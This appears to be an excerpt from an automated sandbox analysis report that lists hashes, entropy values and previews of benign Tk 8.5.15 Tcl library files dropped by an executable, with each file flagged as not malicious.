SHA-256:	3965322893101F480693D45AD365D05CC31099CBE23F5A810C94E2E14D0B6D27
SHA-512:	23E5F222F598DFE26B7D341B6ECD4B0E2240B3B7776063E089DEE4409880398BBFAFF3BCF9A0E8F6CBDA3E66FD193B07C9255A6B2DFCBC7352943D100337E396
Malicious:	false
Preview:	namespace eval ::tk {. ::msgcat::mcset sv "&Abort" "&Avsluta". ::msgcat::mcset sv "&About..." "&Om...". ::msgcat::mcset sv "All Files" "Samtliga filer". ::msgcat::mcset sv "Application Error" "Programfel". ::msgcat::mcset sv "&Blue" "&Bl\u00e5". ::msgcat::mcset sv "&Cancel" "&Avbryt". ::msgcat::mcset sv "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan ej n\u00e5 mappen \"%1\$s\".\nSaknar r\u00e4ttigheter.". ::msgcat::mcset sv "Choose Directory" "V\u00e4lj mapp". ::msgcat::mcset sv "&Clear" "&Radera". ::msgcat::mcset sv "&Clear Console" "&Radera konsollen". ::msgcat::mcset sv "Color" "F\u00e4rg". ::msgcat::mcset sv "Console" "Konsoll". ::msgcat::mcset sv "&Copy" "&Kopiera". ::msgcat::mcset sv "Cu&t" "Klipp u&t". ::msgcat::mcset sv "&Delete" "&Radera". ::msgcat::mcset sv "Details >>" "Detaljer >>". ::msgcat::mcset sv "Directory \"%1\$s\" does not exist." "Mappen \"%1\$s\" finns ej.". ::msgcat::mcset sv "&Directory:

C:\Users\user\Desktop\tk\obsolete.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5594
Entropy (8bit):	4.9941618573215525
Encrypted:	false
SSDEEP:	96:oz4CrtmsXVwM3Er4VAEQ93NZB1o+IFF5ZYi4GUoLf33yLLddzA:oUCrtmsFREEs999o7FF5ZYi4GjLfS/d2
MD5:	7763C90F811620A6C1F0A36BAF9B89CA
SHA1:	30E24595DD683E470FE9F12814D27D6D266B511E
SHA-256:	F6929A5E0D18BC4C6666206C63AC4AAA66EDC4B9F456DFC083300CFA95A44BCD
SHA-512:	2E2887392C67D05EA85DB2E6BFD4AA27779BC82D3B607A7DD221A99EFF0D2A21A6BA47A4F2D2CDFC7CFECD7E93B2B38064C4D5A51406471AE142EC9CC71F5C48
Malicious:	false
Preview:	# obsolete.tcl --.#.# This file contains obsolete procedures that people really shouldn't.# be using anymore, but which are kept around for backward compatibility..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# The procedures below are here strictly for backward compatibility with.# Tk version 3.6 and earlier. The procedures are no longer needed, so.# they are no-ops. You should not use these procedures anymore, since.# they may be removed in some future release...proc tk_menuBar args {}.proc tk_bindForTraversal args {}..# ::tk::classic::restore --.#.# Restore the pre-8.5 (Tk classic) look as the widget defaults for classic.# Tk widgets..#.# The value following an 'option add' call is the new 8.5 value..#.namespace eval ::tk::classic {. # This may need to be adjusted for some windo

C:\Users\user\Desktop\tk\optMenu.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1586
Entropy (8bit):	4.733749898743743
Encrypted:	false
SSDEEP:	48:k2hguC4Zxk+Z0cIWR3afbR1EIC+KtVa+6WX13jZQl9:k6T9N3atqIkeS9FQD
MD5:	D17FE676A057F373B44C9197114F5A69
SHA1:	9745C83EEC8565602F8D74610424848009FFA670
SHA-256:	76DBDBF9216678D48D1640F8FD1E278E7140482E1CAC7680127A9A425CC61DEE
SHA-512:	FF7D9EB64D4367BB11C567E64837CB1DAAA9BE0C8A498CAD00BF63AF45C1826632BC3A09E65D6F51B26EBF2D07285802813ED55C5D697460FC95AF30A943EF8F
Malicious:	false
Preview:	# optMenu.tcl --.#.# This file defines the procedure tk_optionMenu, which creates.# an option button and its associated menu..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# ::tk_optionMenu --.# This procedure creates an option button named $w and an associated.# menu. Together they provide the functionality of Motif option menus:.# they can be used to select one of many values, and the current value.# appears in the global variable varName, as well as in the text of.# the option menubutton. The name of the menu is returned as the.# procedure's result, so that the caller can use it to change configuration.# options on the menu or otherwise manipulate it..#.# Arguments:.# w -...The name to use for the menubutton..# varName -..Global variable to hold the currently selected value..# first

C:\Users\user\Desktop\tk\palette.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7869
Entropy (8bit):	4.892883872925194
Encrypted:	false
SSDEEP:	192:ZUWLyUd51URCJWgWWWuWVWMKoDOdn6jLDlJymGH91QOWJCy3XZQRr:ZLFaCI3dFU3Pdn6P69WJor
MD5:	980BDB3834EF4B7673DA11F5ED215207
SHA1:	D1FBB465506C7AE7157939D901FC669555A1E7EB
SHA-256:	2757E39663269ED2A02F3A6E0599AD5F38D1EEF08082A4660F3C7AC2AAFF2317
SHA-512:	775E332863FC269E7802D885101069F4765DB90A601F866688E5424E9B3A695CEB023DE354BFF44294F72B034D1DE8924160ADEA0C13EC24427424E67DCF7CF8
Malicious:	false
Preview:	# palette.tcl --.#.# This file contains procedures that change the color palette used.# by Tk..#.# Copyright (c) 1995-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# ::tk_setPalette --.# Changes the default color scheme for a Tk application by setting.# default colors in the option database and by modifying all of the.# color options for existing widgets that have the default value..#.# Arguments:.# The arguments consist of either a single color name, which.# will be used as the new background color (all other colors will.# be computed from this) or an even number of values consisting of.# option names and values. The name for an option is the one used.# for the option database, such as activeForeground, not -activeforeground...proc ::tk_setPalette {args} {. if {[winfo depth .] == 1} {..# Just return on monochrome displays, otherwise errors will occur..return. }.

C:\Users\user\Desktop\tk\panedwindow.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5176
Entropy (8bit):	4.933519639131517
Encrypted:	false
SSDEEP:	96:PmpWHrga3awUrH6kdX3pBz6tkm71cHXYV23EmkiYlgfY8:+pWHrP36r6kJ3pBetkm6HXVUmPYlgfY8
MD5:	2DA0A23CC9D6FD970FE00915EA39D8A2
SHA1:	DFE3DC663C19E9A50526A513043D2393869D8F90
SHA-256:	4ADF738B17691489C71C4B9D9A64B12961ADA8667B81856F7ADBC61DFFEADF29
SHA-512:	B458F3D391DF9522D4E7EAE8640AF308B4209CE0D64FD490BFC0177FDE970192295C1EA7229CE36D14FC3E582C7649460B8B7B0214E0FF5629B2B430A99307D4
Malicious:	false
Preview:	# panedwindow.tcl --.#.# This file defines the default bindings for Tk panedwindow widgets and.# provides procedures that help in implementing those bindings...bind Panedwindow <Button-1> { ::tk::panedwindow::MarkSash %W %x %y 1 }.bind Panedwindow <Button-2> { ::tk::panedwindow::MarkSash %W %x %y 0 }..bind Panedwindow <B1-Motion> { ::tk::panedwindow::DragSash %W %x %y 1 }.bind Panedwindow <B2-Motion> { ::tk::panedwindow::DragSash %W %x %y 0 }..bind Panedwindow <ButtonRelease-1> {::tk::panedwindow::ReleaseSash %W 1}.bind Panedwindow <ButtonRelease-2> {::tk::panedwindow::ReleaseSash %W 0}..bind Panedwindow <Motion> { ::tk::panedwindow::Motion %W %x %y }..bind Panedwindow <Leave> { ::tk::panedwindow::Leave %W }..# Initialize namespace.namespace eval ::tk::panedwindow {}..# ::tk::panedwindow::MarkSash --.#.# Handle marking the correct sash for possible dragging.#.# Arguments:.# w..the widget.# x..widget local x coord.# y..widget local y coord.# proxy.whether this should be a prox

C:\Users\user\Desktop\tk\pkgIndex.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.024283332963984
Encrypted:	false
SSDEEP:	6:Cjtl17nhRVyDBc6ynID/cL4RpncleXN17MQ94QfBIQ0wrof7MQ94QfBIQe8:ot7rhGDO6LYZlCBIg8BIF8
MD5:	983834D9BD60ABFF7BD824E2CA8EC5F3
SHA1:	A13242DBA78A37E34AA857BE6F9170441D738372
SHA-256:	DCB23E79AD603EC1C521C8765E89C72B6EB0D37E45A80F929BCBB388F9537E6E
SHA-512:	0D90CDC7E15D25A5C462A396FF8027E1EC3AE34E234B8BF6225820339DB7281E75313A6DCCBC479100C1F11CD896365BD8871EBBF45FF9F4A5A1DE6F34FAD0B5
Malicious:	false
Preview:	if {[catch {package present Tcl 8.5.0}]} { return }..if {($::tcl_platform(platform) eq "unix") && ([info exists ::env(DISPLAY)]...\|\| ([info exists ::argv] && ("-display" in $::argv)))} {.. package ifneeded Tk 8.5.15 [list load [file join $dir .. .. bin libtk8.5.dll] Tk]..} else {.. package ifneeded Tk 8.5.15 [list load [file join $dir .. .. bin tk85.dll] Tk]..}..

C:\Users\user\Desktop\tk\safetk.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7265
Entropy (8bit):	4.8155351114904965
Encrypted:	false
SSDEEP:	192:keEoaa0QfsimXorjpgj4oN5QeO9yMfUKvLAN6Zo:keEoRHsiWadgku2UeG
MD5:	79D3CAF583DE0D5C68F377475C2F27F6
SHA1:	2C156DD275DCB09D78994B864EB1BEB2FCA69BAE
SHA-256:	B43A52FABF936FB714BED082773968A6B47A2F06838BCB7BD7D08C0E4F7F8EAD
SHA-512:	76406249A6A99E56F0DA7F021FD44A710F5BE9262BA11859E10FCAE3F70BE9E0CC6B575A950142B8A5B33A7661A0B10F2A89350CDCA7BF67D3D862DE3523B8A8
Malicious:	false
Preview:	# safetk.tcl --.#.# Support procs to use Tk in safe interpreters..#.# Copyright (c) 1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...# see safetk.n for documentation..#.#.# Note: It is now ok to let untrusted code being executed.# between the creation of the interp and the actual loading.# of Tk in that interp because the C side Tk_Init will.# now look up the master interp and ask its safe::TkInit.# for the actual parameters to use for it's initialization (if allowed),.# not relying on the slave state..#..# We use opt (optional arguments parsing).package require opt 0.4.1;..namespace eval ::safe {.. # counter for safe toplevels. variable tkSafeId 0.}..#.# tkInterpInit : prepare the slave interpreter for tk loading.# most of the real job is done by loadTk.# returns the slave name (tkInterpInit does).#.proc ::safe::tkInterpIni

C:\Users\user\Desktop\tk\scale.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7608
Entropy (8bit):	4.945309285856881
Encrypted:	false
SSDEEP:	192:q1xTLZHLUAp8cZIQ+Umuy9vYE2dLTaFwHZeABypyTtB:uUN1Umn2dKWHIpCB
MD5:	DC05771A2021CA1CBB7E7316352A139F
SHA1:	E97752DADB9174A2759B52C5E48DEF096DBE420B
SHA-256:	FBE5D513D39AA18ADB82F2DE2BA5D761996476F6A1276CAE9E06D7861103F818
SHA-512:	607439310384E92F5E302291734AAB968634E54E952893725D92D321BB7A600CD73D13EAB130636B3D25ACD86E738993C64E4C061E7FB1B7CB94C655C817B185
Malicious:	false
Preview:	# scale.tcl --.#.# This file defines the default bindings for Tk scale widgets and provides.# procedures that help in implementing the bindings..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994-1995 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# The code below creates the default class bindings for entries..#-------------------------------------------------------------------------..# Standard Motif bindings:..bind Scale <Enter> {. if {$tk_strictMotif} {..set tk::Priv(activeBg) [%W cget -activebackground]..%W configure -activebackground [%W cget -background]. }. tk::ScaleActivate %W %x %y.}.bind Scale <Motion> {. tk::ScaleActivate %W %x %y.}.bind Scale <Leave> {. if {$tk_strictMotif} {..%W configure -activebackground $tk::Priv(activeBg). }.

C:\Users\user\Desktop\tk\scrlbar.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12006
Entropy (8bit):	4.992572837214175
Encrypted:	false
SSDEEP:	192:AJVS+eVIj0DQ0c0tMrpQQtfJMZqSwiXEfY4yhIa7yLIVNpIgdWmDN1gFBA:4jwQLsIGOfmkSwORVqaGcV4q7CBA
MD5:	A17526D7D97D18887AB6EDFA38E7AE74
SHA1:	55018181E6E926C50FDB81F8115FD48CD396CA5F
SHA-256:	3DCA6AB1DF2FA25E2A50A5CDE74353A214298C095E57759301F4FB400DABF58C
SHA-512:	7C83C196FA4ECE597B3A9F8604AAFFA72E152ED65D768D6B9D42F09246CD649A9F4DB1D931D1B1E21DBAEF5258324C63259382C38B44214EE297D1073F4B0B55
Malicious:	false
Preview:	# scrlbar.tcl --.#.# This file defines the default bindings for Tk scrollbar widgets..# It also provides procedures that help in implementing the bindings..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994-1996 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# The code below creates the default class bindings for scrollbars..#-------------------------------------------------------------------------..# Standard Motif bindings:.if {[tk windowingsystem] eq "x11"} {..bind Scrollbar <Enter> {. if {$tk_strictMotif} {..set tk::Priv(activeBg) [%W cget -activebackground]..%W configure -activebackground [%W cget -background]. }. %W activate [%W identify %x %y].}.bind Scrollbar <Motion> {. %W activate [%W identify %x %y].}..# The "info exists" command in the follo

C:\Users\user\Desktop\tk\spinbox.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15087
Entropy (8bit):	5.016543299113458
Encrypted:	false
SSDEEP:	192:aR1uvx3VYxRryqkfYQ1427SCe3bbVFMiop9Y465uaMY+c6RhO1ON6Qb4qRiZ0NPW:MuS3XVF6pl65/YRhO46qz8wdEt
MD5:	BFDE52A662336A590C71948294E904D4
SHA1:	6F14762A91EAC479FA63C60049DA4DA5D38AF2C6
SHA-256:	E69D65C61096377805982CD52B748EE11DA7761AEE122757584D25C2EEB75759
SHA-512:	4ACB4B866A59B9288C4D20800CB91865D101C65D53C51916260BFF7821D107F0ADBBF6E1EC4C34D19CD828C5FCDB1EB408A8EFDC16797F47FD1EAA2B9077E984
Malicious:	false
Preview:	# spinbox.tcl --.#.# This file defines the default bindings for Tk spinbox widgets and provides.# procedures that help in implementing those bindings. The spinbox builds.# off the entry widget, so it can reuse Entry bindings and procedures..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..# Copyright (c) 1999-2000 Jeffrey Hobbs.# Copyright (c) 2000 Ajuba Solutions.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# Elements of tk::Priv that are used in this file:.#.# afterId -..If non-null, it means that auto-scanning is underway.#...and it gives the "after" id for the next auto-scan.#...command to be executed..# mouseMoved -..Non-zero means the mouse has moved a significant.#...amount since the button went down (so, for example,.#...start dragging out a

C:\Users\user\Desktop\tk\tclIndex Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	22293
Entropy (8bit):	4.754781774330704
Encrypted:	false
SSDEEP:	384:edtm3fv2ZzffGIgowSDxD7n2s7AcBnaUuFyLWFot5gzSG3k96vNTWuoJnfOvWhbf:eds3fv2ZzffGIgowSDxD7nd7AcBnahFE
MD5:	CDF95BAC59CD99E61769D91753521781
SHA1:	25C66F8D06275DD8692380193DFCC84230F6C2D0
SHA-256:	9D9A75EBF2F72666CDE7C8E00BB4985A5581B7668F33948B4A25D1E860755F63
SHA-512:	A678F234AC74734831CCC1CDBAD0545770AF91F5FC663908EB19B3AAFD858460A29AC0BB5ADF6863AA674346066B5DD7C8DE9932BC93ACA909D970D21E75FB79
Malicious:	false
Preview:	# Tcl autoload index file, version 2.0.# This file is generated by the "auto_mkindex" command.# and sourced to set up indexing information for one or.# more commands. Typically each line is a command that.# sets an element in the auto_index array, where the.# element name is the name of a command and the value is.# a script that loads the command...set auto_index(::tk::dialog::error::Return) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::dialog::error::Details) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::dialog::error::SaveToLog) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::dialog::error::Destroy) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::dialog::error::bgerror) [list source [file join $dir bgerror.tcl]].set auto_index(bgerror) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::ButtonInvoke) [list source [file join $dir button.tcl]].set auto_index(::tk::ButtonAutoInvoke) [list source [file join

C:\Users\user\Desktop\tk\tearoff.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5143
Entropy (8bit):	4.671801205676465
Encrypted:	false
SSDEEP:	96:MgPXEnPQcTtD7zxeHK7ijhgdhAhbbjymL/KK2pLQY4QYNHL43IwzS6ejW:MgPUnPtTtFeqmjhgdhIbbjymL/KKeLQY
MD5:	405AB0EA001287D3304372EC6005E67F
SHA1:	159EBB2B84CABC16EDDB9B5335F2AE2043F46AF7
SHA-256:	CE7B3E10B24C14000B8BDD85B2F5B949B57122467C579B8DA2762AA7CFD9695C
SHA-512:	845ABE6D27D91F2525C513A57E9C001E71BB11CF0E4031B83F57FC54D1C6F941A8B28CA83428125173C7F2A7840214E9DAEA2BB2982C6C232D5DC6648A128452
Malicious:	false
Preview:	# tearoff.tcl --.#.# This file contains procedures that implement tear-off menus..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# ::tk::TearoffMenu --.# Given the name of a menu, this procedure creates a torn-off menu.# that is identical to the given menu (including nested submenus)..# The new torn-off menu exists as a toplevel window managed by the.# window manager. The return value is the name of the new menu..# The window is created at the point specified by x and y.#.# Arguments:.# w -...The menu to be torn-off (duplicated)..# x -...x coordinate where window is created.# y -...y coordinate where window is created..proc ::tk::TearOffMenu {w {x 0} {y 0}} {. # Find a unique name to use for the torn-off menu. Find the first. # ancestor of w that is a toplevel but not a menu,

C:\Users\user\Desktop\tk\text.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	32484
Entropy (8bit):	4.928138526940929
Encrypted:	false
SSDEEP:	384:Th1zJSojNGbEBFFRzGa4UNKEFx8wredko/gVVqeNi/9bembFWaHnla98ffJ2qiPp:TPNGQF6+Ndyy+eina98ffJAAlde
MD5:	C7F072F2CB5C97E920A47D7252199A51
SHA1:	8D483C2687BAA2F068BF7DFFB7440F7EC3938990
SHA-256:	5346EE946056DA7304112CAE161172AEB29E50BB4A3BB0095B97BFB4DB6985C5
SHA-512:	01AE76BC876477A4A1BE5060BB0563AFA2D74F74515F934C4A83CEBF334AD1E013F697C09C5E86FD7B3D4754D3A5592DBD61E26E8F7D2378DFBC3F2C52B54C5F
Malicious:	false
Preview:	# text.tcl --.#.# This file defines the default bindings for Tk text widgets and provides.# procedures that help in implementing the bindings..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..# Copyright (c) 1998 by Scriptics Corporation..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# Elements of ::tk::Priv that are used in this file:.#.# afterId -..If non-null, it means that auto-scanning is underway.#...and it gives the "after" id for the next auto-scan.#...command to be executed..# char -..Character position on the line; kept in order.#...to allow moving up or down past short lines while.#...still remembering the desired position..# mouseMoved -..Non-zero means the mouse has moved a significant.#...amount since the button went down (so, for exampl

C:\Users\user\Desktop\tk\tk.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	18081
Entropy (8bit):	5.011030408518654
Encrypted:	false
SSDEEP:	384:/2QlIVXSlH462gngqeObubJLwvYmE5h2PQQ86cLV8iB4tdpAL1G0J5hAzUSlmvur:/2+IVilHRkh2PQJJlB4a1u9c0
MD5:	2523D60BBAE5C5927EEC73F90EA20B40
SHA1:	8B4054EF91624E1087769D5656E0E4427E8E3590
SHA-256:	662EE99D4EB4E3FC92E53BCBFA83AAA090AEF19C0CCA60E64221AE7A7CBD2920
SHA-512:	46BD4207D7CE302740E8F6ACC2DDE2304B6A375FFECAA8456E55B9F3821639C1282FAE0F18984C80790FC5076B723F1F263F3B7B7D06D2D580360CC3587F30E8
Malicious:	false
Preview:	# tk.tcl --.#.# Initialization script normally executed in the interpreter for each Tk-based.# application. Arranges class bindings for widgets..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1996 Sun Microsystems, Inc..# Copyright (c) 1998-2000 Ajuba Solutions..#.# See the file "license.terms" for information on usage and redistribution of.# this file, and for a DISCLAIMER OF ALL WARRANTIES...package require Tcl 8.5.;# Guard against [source] in an 8.4- interp before....;# using 8.5 [package] features..# Insist on running with compatible version of Tcl.package require Tcl 8.5.0.# Verify that we have Tk binary and script components from the same release.package require -exact Tk 8.5.15..# Create a ::tk namespace.namespace eval ::tk {. # Set up the msgcat commands. namespace eval msgcat {..namespace export mc mcmax. if {[interp issafe] \|\| [catch {package require msgcat}]} {. # The msgcat package is not available. S

C:\Users\user\Desktop\tk\tkfbox.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	54050
Entropy (8bit):	4.98068652124205
Encrypted:	false
SSDEEP:	768:arK2vrrHpHxgsOo66U+uDKjrvX8NzpNCHK7fCj:ar9vrr0Po66U+sK/vmpNCHK7f+
MD5:	0E7615066B92D824C54229DF3B3A0C93
SHA1:	1F7979BA261BF3494C28F3DBE17D8741B254AF7D
SHA-256:	7D70070BBE8059AF358B8BC98D61D5652D4028236383B20FEBCAD350E9CA63A1
SHA-512:	0557422D5828A41F6C59BF19E5A171D99E50CCED1F4A46A5F58AB137DC27D06B187A93362AD9F36CABE8887E442EFBC59670D74B6E5C8A60DF2D6218BA22D157
Malicious:	false
Preview:	# tkfbox.tcl --.#.#.Implements the "TK" standard file selection dialog box. This.#.dialog box is used on the Unix platforms whenever the tk_strictMotif.#.flag is not set..#.#.The "TK" standard file selection dialog box is similar to the.#.file selection dialog box on Win95(TM). The user can navigate.#.the directories by clicking on the folder icons or by.#.selecting the "Directory" option menu. The user can select.#.files by clicking on the file icons or by entering a filename.#.in the "Filename:" entry..#.# Copyright (c) 1994-1998 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..package require Ttk...#----------------------------------------------------------------------.#.#.. I C O N L I S T.#.# This is a pseudo-widget that implements the icon list inside the.# ::tk::dialog::file:: dialog box..#.#----------------------------------------------------------------------..#

C:\Users\user\Desktop\tk\ttk\altTheme.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3342
Entropy (8bit):	4.893964295093112
Encrypted:	false
SSDEEP:	48:xICAIX5RupDdMrwuQb8qRZRK9FVGQJFVGQuxzUFIG0usf2kGKQH+n5dvW88L+iSo:hXoFADfVta9DY
MD5:	909F379DB70A6072D49D0B48D07A32FD
SHA1:	D6E0323EB4549327E5A4722015448A80AC3A99E4
SHA-256:	83D9A5889205EE8EAE23E262F15187EEBFE19375BC6C9D464E570CD5FD1F5B2C
SHA-512:	9ECAE6EF7EC784B5104ADFA2EBBB1F33116470BD3A0346D04D945A3A20C569EC052C28BCF4E914F4264D0CA80C27AD5FB43078CFE38318203E5698B6B84D13CC
Malicious:	false
Preview:	#.# Ttk widget set: Alternate theme.#..namespace eval ttk::theme::alt {.. variable colors. array set colors {..-frame .."#d9d9d9"..-window.."#ffffff"..-darker ."#c3c3c3"..-border.."#414141"..-activebg ."#ececec"..-disabledfg."#a3a3a3"..-selectbg."#4a6984"..-selectfg."#ffffff". }.. ttk::style theme settings alt {...ttk::style configure "." \.. -background .$colors(-frame) \.. -foreground .black \.. -troughcolor.$colors(-darker) \.. -bordercolor.$colors(-border) \.. -selectbackground .$colors(-selectbg) \.. -selectforeground .$colors(-selectfg) \.. -font ..TkDefaultFont \.. ;...ttk::style map "." -background \.. [list disabled $colors(-frame) active $colors(-activebg)] ;..ttk::style map "." -foreground [list disabled $colors(-disabledfg)] ;. ttk::style map "." -embossed [list disabled 1] ;...ttk::style configure TButton \.. -anchor center -width -11 -padding "1 1" \.. -relief raised -shiftrelief 1 \.. -highlightthickness 1 -highligh

C:\Users\user\Desktop\tk\ttk\aquaTheme.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2001
Entropy (8bit):	4.976834248247965
Encrypted:	false
SSDEEP:	24:mjP8dTLsQdWyrF4srKp7UPl7UzT7Ub0aeKgNIii6jOMj0b3M+t2bUuERG6dup+Kx:tdlBlblITKleKgNX1gPc+JFzVcX0jX4
MD5:	288F477ED1FBFBB02CF9E35B23878EDB
SHA1:	BBC4AD4A502D52DEDB40D44BBFCB7DA7897BBDC4
SHA-256:	C2D4B12BD82C056B3A1B5C655FFC2D85208DF74C3FA486EF64AADBC64A021F95
SHA-512:	CE28CCFE9F7E16AC5B9E5C8C8A0445ECBAE82493F8A5C779B4FA4E2FD9BA1F7E7D4A644AC6283A104AADE2EF1F5CFAC676B52CC5D700ACF5DF77653006FB9A4B
Malicious:	false
Preview:	#.# Aqua theme (OSX native look and feel).#..namespace eval ttk::theme::aqua {. ttk::style theme settings aqua {...ttk::style configure . \.. -font TkDefaultFont \.. -background systemWindowBody \.. -foreground systemModelessDialogActiveText \.. -selectbackground systemHighlight \.. -selectforeground systemModelessDialogActiveText \.. -selectborderwidth 0 \.. -insertwidth 1...ttk::style map . \.. -foreground {disabled systemModelessDialogInactiveText... background systemModelessDialogInactiveText} \.. -selectbackground {background systemHighlightSecondary... !focus systemHighlightSecondary} \.. -selectforeground {background systemModelessDialogInactiveText... !focus systemDialogActiveText}...# Workaround for #1100117:..# Actually, on Aqua we probably shouldn't stipple images in..# disabled buttons even if it did work.....ttk::style configure . -stipple {}...ttk::style configure TButton -anchor center -width -6..ttk::style configure Toolbutton -

C:\Users\user\Desktop\tk\ttk\button.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2978
Entropy (8bit):	4.8919006418640265
Encrypted:	false
SSDEEP:	48:hpNRZ/rtWkRMC0ScGHsAEfKPi7K1MFNQ6z4Dvh8niT6CUI+SfRHThp:DNRZzse1cGH3UvKmFNQ6z2hT6CUI+4Hb
MD5:	EA7CF40852AFD55FFDA9DB29A0E11322
SHA1:	B7B42FAC93E250B54EB76D95048AC3132B10E6D8
SHA-256:	391B6E333D16497C4B538A7BDB5B16EF11359B6E3B508D470C6E3703488E3B4D
SHA-512:	123D78D6AC34AF4833D05814220757DCCF2A9AF4761FE67A8FE5F67A0D258B3C8D86ED346176FFB936AB3717CFD75B4FAB7373F7853D44FA356BE6E3A75E51B9
Malicious:	false
Preview:	#.# Bindings for Buttons, Checkbuttons, and Radiobuttons..#.# Notes: <Button1-Leave>, <Button1-Enter> only control the "pressed".# state; widgets remain "active" if the pointer is dragged out..# This doesn't seem to be conventional, but it's a nice way.# to provide extra feedback while the grab is active..# (If the button is released off the widget, the grab deactivates and.# we get a <Leave> event then, which turns off the "active" state).#.# Normally, <ButtonRelease> and <ButtonN-Enter/Leave> events are .# delivered to the widget which received the initial <ButtonPress>.# event. However, Tk [grab]s (#1223103) and menu interactions.# (#1222605) can interfere with this. To guard against spurious.# <Button1-Enter> events, the <Button1-Enter> binding only sets.# the pressed state if the button is currently active..#..namespace eval ttk::button {}..bind TButton <Enter> ..{ %W instate !disabled {%W state active} }.bind TButton <Leave>..{ %W state !active }.bind TButton <Key-space>.{ ttk:

C:\Users\user\Desktop\tk\unsupported.tcl Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	11390
Entropy (8bit):	5.001395733354833
Encrypted:	false
SSDEEP:	192:1wMv11IDCB7PFPHGosvS6UMn6uPrLBfVcO9MGM/OTMjmrUwrt:pduDLBfrMYMjw3Z
MD5:	A2F80093F3AEEEAD14737CFE254EF4DE
SHA1:	E67FC84CA26BEF5E9913FC4E545141BC914AA1EE
SHA-256:	6212DCA4A797FCEBACE36F8EA2C6A4CE4BC660BA392C0ECB80724807263197F1
SHA-512:	0F8D1DFEFE95F779A145BDC9D0C63D1CF9D8C75C648698C37CBFF71132F4178464B2DEA31909F386AE446E88FD89BCBE335765F2C3577456EA40A9DE24197C5C
Malicious:	false
